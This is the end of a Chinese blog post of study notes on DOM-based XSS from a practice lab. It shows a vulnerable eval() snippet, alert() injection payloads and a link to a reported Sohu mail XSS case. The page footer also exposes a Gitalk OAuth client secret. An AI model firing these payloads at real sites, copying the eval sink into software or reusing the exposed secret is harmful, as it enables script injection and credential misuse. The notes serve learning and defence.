style=&quot;background-image:url(&apos;transcolor.gif&apos;)&quot;&gt;&lt;/em&gt;&lt;/div&gt;</span><br><span class="line">&lt;div id=&quot;colors&quot;&gt;&lt;/div&gt;</span><br><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">showcolors();</span><br><span class="line">try &#123;document.getElementById(&apos;box&apos;).style.backgroundColor = cvalue;&#125; catch(e) &#123;&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.htm?||alert(/xss/)</span><br></pre></td></tr></table></figure>
<p>这里是由于fun变量没有过滤导致的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fun = varnames[2] || &apos;&apos;;       这里fun等于alert(/xss/)</span><br></pre></td></tr></table></figure>
<p>eval函数执行  parent.alert(/xss/) 触发xss</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">	if(fun) eval(&apos;parent.&apos;+fun+&apos;(&quot;&apos;+setv+&apos;&quot;)&apos;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>somepayload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;);alert(1);//</span><br></pre></td></tr></table></figure>
<h2 id="一些乌云上的XSS案例"><a href="#一些乌云上的XSS案例" class="headerlink" title="一些乌云上的XSS案例"></a>一些乌云上的XSS案例</h2><p>搜狐邮箱储存型XSS <a href="https://shuimugan.com/bug/view?bug_no=167250" target="_blank" rel="noopener">https://shuimugan.com/bug/view?bug_no=167250</a></p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lego
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://legoc.gitee.io/2019/02/26/XSS学习小记/" title="XSS学习小记">http://legoc.gitee.io/2019/02/26/XSS学习小记/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"># XSS</a>
          
            <a href="/tags/靶场学习/" rel="tag"># 靶场学习</a>
          
            <a href="/tags/dom-xss/" rel="tag"># dom-xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/26/关于SRC挖掘的一点小脚本/" rel="next" title="关于SRC挖掘的一点小脚本">
                <i class="fa fa-chevron-left"></i> 关于SRC挖掘的一点小脚本
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/27/内网渗透学习/" rel="prev" title="内网渗透学习">
                内网渗透学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
 <div id="gitalk-container"></div>
 
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png"
                alt="lego" />
            
              <p class="site-author-name" itemprop="name">lego</p>
              <p class="site-description motion-element" itemprop="description">从小菜鸡往大菜鸡成长的路上...</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">63</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#xss靶场"><span class="nav-number">1.</span> <span class="nav-text">xss靶场</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#dom-xss"><span class="nav-number">2.</span> <span class="nav-text">dom-xss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一个简单的demo"><span class="nav-number">2.0.1.</span> <span class="nav-text">一个简单的demo</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#几种常见的dom型xss"><span class="nav-number">2.0.2.</span> <span class="nav-text">几种常见的dom型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#使用document-write直接输出导致浏览器解析恶意代码"><span class="nav-number">2.0.2.1.</span> <span class="nav-text">使用document.write直接输出导致浏览器解析恶意代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用innerHTML直接输出导致浏览器解析恶意代码"><span class="nav-number">2.0.2.2.</span> <span class="nav-text">使用innerHTML直接输出导致浏览器解析恶意代码</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用location-location-href-location-replace-iframe-src造成的XSS"><span class="nav-number">2.0.2.3.</span> <span class="nav-text">使用location/location.href/location.replace/iframe.src造成的XSS</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#使用setTimeout-setInterval造成的XSS"><span class="nav-number">2.0.2.4.</span> <span class="nav-text">使用setTimeout/setInterval造成的XSS</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dom-xss实例"><span class="nav-number">2.0.3.</span> <span class="nav-text">dom-xss实例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一些乌云上的XSS案例"><span class="nav-number">2.1.</span> <span class="nav-text">一些乌云上的XSS案例</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lego</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '76aae4c57ee7f811d638',
          clientSecret: 'd6d32a0bf34087bf9ee31a1a74fd5bd72cc23c92',
          repo: 'legoc.github.io',
          owner: 'legoc',
          admin: ['legoc'],
          id: decodeURI(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>
	   
	   
	   




  





  

  

  

  
  

  

  

  

</body>
</html>
